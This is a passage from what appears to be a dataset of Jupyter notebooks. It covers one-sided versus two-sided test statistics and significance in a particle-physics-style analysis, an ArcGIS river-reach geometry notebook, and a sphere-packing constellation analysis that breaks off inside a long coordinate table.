use $q_0$ for this modified test statistic\n$$\nq_0 = \\begin{cases}\nt_0 &\\text{if } \\hat\\mu \\ge 0 \\\\\n0 &\\text{otherwise}\n\\end{cases}\n$$", "_____no_output_____" ] ], [ [ "plt.hist(t0, alpha=0.5, bins=20, range=(0, 20), label=\"$t_0$\")\nq0 = t0.copy()\nq0 = np.where(mu < 0, 0, t0)\nplt.hist(q0, alpha=0.5, bins=20, range=(0, 20), label=\"$q_0$\")\nplt.legend()\nplt.axhline()\nplt.xlabel(\"$t_0, q_0$\")\nplt.semilogy();", "_____no_output_____" ] ], [ [ "If we observed $t_0 = q_0 = 15$ in a real experiment, we need to compare it with the $q_0$ distribution and not with the $t_0$ distribution to compute the p-value.", "_____no_output_____" ] ], [ [ "print(f\"Wrong: p-value based on t0-distribution {np.mean(t0 > 15)}\")\nprint(f\"Right: p-value based on q0-distribution {np.mean(q0 > 15)}\")", "Wrong: p-value based on t0-distribution 0.006\nRight: p-value based on q0-distribution 0.004\n" ] ], [ [ "As we can see, the p-value is enhanced in this case, because we do not need to consider the negative fluctuations at all. The conversion to significance $Z$ is done with a normal distribution.", "_____no_output_____" ] ], [ [ "from scipy.stats import norm\n\np = np.mean(q0 > 15)\nprint(f\"Z = {norm.ppf(1 - p):.2f}\")", "Z = 2.65\n" ] ], [ [ "#### Searches for deviations where the sign of $\\mu$ is not known a priori\n\nIf cannot exclude a priori that our signal has $\\mu < 0$, we need to use the $t_0$ distribution instead of $q_0$.\n\nIf we observed $t_0 = 15$ in a real experiment, we need to compare it with $t_0$ distribution to compute the p-value.", "_____no_output_____" ] ], [ [ "print(f\"Right: p-value based on t0-distribution {np.mean(t0 > 15)}\")", "Right: p-value based on t0-distribution 0.006\n" ] ], [ [ "As we can see, the p-value is diluted in this case, because we need to consider fluctuations in both directions. 
In other words, the Look-Elsewhere Effect is larger in this case, because more kinds of fluctuations in the background can be confused with a signal.", "_____no_output_____" ] ], [ [ "from scipy.stats import norm\n\np = np.mean(t0 > 15)\nprint(f\"Z = {norm.ppf(1 - p):.2f}\")", "Z = 2.51\n" ] ], [ [ "Accordingly, the significance is a bit lower compared to the previous case.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72e0e783fb1b8895bf70d20e54f1e8c3e35e12b
3,424
ipynb
Jupyter Notebook
notebooks/03_reach_layer_geometry.ipynb
whitewater-gis/nhdplus-reach-tracer
8358dc52ee0cde814c0919ad23c8dfe45d156129
[ "Apache-2.0" ]
2
2019-03-25T04:54:56.000Z
2019-03-25T15:41:49.000Z
notebooks/03_reach_layer_geometry.ipynb
whitewater-gis/water-reach-tracer
8358dc52ee0cde814c0919ad23c8dfe45d156129
[ "Apache-2.0" ]
3
2020-03-24T17:04:13.000Z
2020-06-08T17:06:33.000Z
notebooks/03_reach_layer_geometry.ipynb
whitewater-gis/water-reach-tracer
8358dc52ee0cde814c0919ad23c8dfe45d156129
[ "Apache-2.0" ]
null
null
null
23.292517
115
0.556951
[ [ [ "from arcgis.gis import GIS\nimport os\n\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv())\n\nimport sys\nsys.path.append('../src')\n\nimport reach_tools\n\n%load_ext autoreload\n%autoreload 2", "_____no_output_____" ], [ "url_reach_line = os.getenv('URL_REACH_LINE')\nurl_reach_centroid = os.getenv('URL_REACH_CENTROID')\nurl_reach_points = os.getenv('URL_REACH_POINT')\n\nreach_id_ldub = 2156\nreach_id_farmies = 2269\nreach_id_truss = 2270\nreach_id_bz = 3064\nreach_id_canyon = 3066\nreach_id_opal = 5199\n\nlst_reach_id = [reach_id_ldub, reach_id_farmies, reach_id_truss, reach_id_bz, reach_id_canyon, reach_id_opal]", "_____no_output_____" ], [ "gis = GIS(username=os.getenv('ARCGIS_USERNAME'), password=os.getenv('ARCGIS_PASSWORD'))\ngis", "_____no_output_____" ], [ "lyr_reach_line = reach_tools.ReachFeatureLayer(url_reach_line, gis)\nlyr_reach_centroid = reach_tools.ReachFeatureLayer(url_reach_centroid, gis)\nlyr_reach_points = reach_tools.ReachPointFeatureLayer(url_reach_points, gis)", "_____no_output_____" ], [ "reach = reach_tools.Reach.get_from_aw(2270)\nwebmap = reach.update_putin_takeout_and_trace(webmap=True)\nwebmap", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e72e216a8af0651f829eec1b9c1ae6cbdb70c4f2
295,389
ipynb
Jupyter Notebook
RBF/analysis_spherepacking.ipynb
v-i-s-h/dl-vi-comm
80032588a5e6e13bdc397ce9bd51fed73a6045bf
[ "MIT" ]
4
2020-07-30T10:45:03.000Z
2022-01-21T01:03:53.000Z
RBF/analysis_spherepacking.ipynb
v-i-s-h/dl-vi-comm
80032588a5e6e13bdc397ce9bd51fed73a6045bf
[ "MIT" ]
null
null
null
RBF/analysis_spherepacking.ipynb
v-i-s-h/dl-vi-comm
80032588a5e6e13bdc397ce9bd51fed73a6045bf
[ "MIT" ]
1
2021-02-26T10:55:27.000Z
2021-02-26T10:55:27.000Z
164.105
25,412
0.794254
[ [ [ "# Analysis of Sphere packing efficeincy", "_____no_output_____" ] ], [ [ "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import cdist # For calculating QPSK decoding\nimport dill\nfrom itertools import product, cycle\n\nimport tensorflow.keras.backend as K", "_____no_output_____" ] ], [ [ "System Configuration", "_____no_output_____" ] ], [ [ "blkSize = 4\nchDim = 2\n\n# Input\ninVecDim = 2 ** blkSize # 1-hot vector length for block\nencDim = 2*chDim\n\nSNR_range_dB = np.arange( 0.0, 11.0, 1.0 )\n\none_hot_code = np.eye(inVecDim)", "_____no_output_____" ] ], [ [ "## Traditional Systems", "_____no_output_____" ], [ "### QAM", "_____no_output_____" ] ], [ [ "qam_map = np.array(list(map(list, product([-1, +1], repeat=blkSize))))\nqam_sym_pow = np.mean(np.sum(qam_map*qam_map,axis=1))\nprint( \"QAM Avg. Tx Power:\", qam_sym_pow )\n\nnoisePower = qam_sym_pow * 10.0**(-SNR_range_dB/10.0)\nn0_per_comp = noisePower/(2*chDim)", "QAM Avg. Tx Power: 4.0\n" ] ], [ [ "### Agrell Map", "_____no_output_____" ] ], [ [ "agrell_map = []\nif blkSize==2 and chDim==1:\n agrell_map = np.array([\n [ -1.0, -1.0 ],\n [ -1.0, 1.0 ],\n [ 1.0, -1.0 ],\n [ 1.0, 1.0 ]\n ])\nelif blkSize==4 and chDim==2:\n agrell_map = np.array([\n [2.148934030042627, 0.0, 0.0, 0.0],\n [0.7347204676695321, 1.4142135623730951, 0.0, 0.0],\n [0.7347204676695321, -1.4142135623730951, 0.0, 0.0],\n [0.7347204676695321, 0.0, 1.4142135623730951, 0.0],\n [0.7347204676695321, 0.0, -1.4142135623730951, 0.0],\n [0.7347204676695321, 0.0, 0.0, 1.4142135623730951],\n [0.7347204676695321, 0.0, 0.0, -1.4142135623730951],\n [-0.6174729817844246, 1.0, 1.0, 1.0],\n [-0.6174729817844246, 1.0, 1.0, -1.0],\n [-0.6174729817844246, 1.0, -1.0, 1.0],\n [-0.6174729817844246, 1.0, -1.0, -1.0],\n [-0.6174729817844246, -1.0, 1.0, 1.0],\n [-0.6174729817844246, -1.0, 1.0, -1.0],\n [-0.6174729817844246, -1.0, -1.0, 1.0],\n [-0.6174729817844246, -1.0, -1.0, -1.0],\n [-1.6174729817844242, 0.0, 0.0, 0.0]\n 
])\nelif blkSize==8 and chDim==4:\n agrell_map = np.array([\n [ -256.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -256.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -370.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -373.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 373.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, -114.0, 139.0, 117.0 
],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, -120.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, -128.0, 136.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, 120.0, -136.0, 142.0, 139.0, -139.0 
],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, -120.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ -128.0, 128.0, 136.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 0.0, -256.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, -256.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 
0.0, -248.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, -242.0, -245.0, 245.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, 248.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, -248.0, -8.0, 248.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, -248.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, -248.0, 248.0, -8.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, -248.0, 248.0, -8.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, -248.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -264.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -264.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, -242.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, -245.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, 11.0, -11.0 
],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 14.0, 267.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, -8.0, 270.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, -242.0, -245.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, -8.0, 248.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, -242.0, -245.0, 245.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, 248.0, -242.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 8.0, 248.0, 248.0, -242.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 8.0, 248.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 0.0, 264.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, -248.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -264.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, 
-8.0, -264.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, -242.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, -245.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, -267.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, 11.0, 245.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 14.0, 267.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, -8.0, 270.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, -8.0, 248.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 8.0, 248.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 0.0, 256.0, 264.0, -8.0, -8.0, 14.0, 11.0, -11.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, -120.0, 120.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 
128.0, -128.0, 136.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, -128.0, 136.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, -136.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, -114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, -136.0, 120.0, 142.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, -114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, 120.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -370.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -373.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, -117.0, 373.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, -120.0, 120.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, 
-114.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, 142.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, -136.0, 142.0, 139.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, -136.0, 120.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, -114.0, -117.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, -114.0, 139.0, 117.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, 142.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, 120.0, -136.0, 142.0, 139.0, -139.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, -114.0, -117.0, 117.0 ],\n [ 128.0, 128.0, 136.0, 120.0, 120.0, -114.0, 139.0, -139.0 ],\n 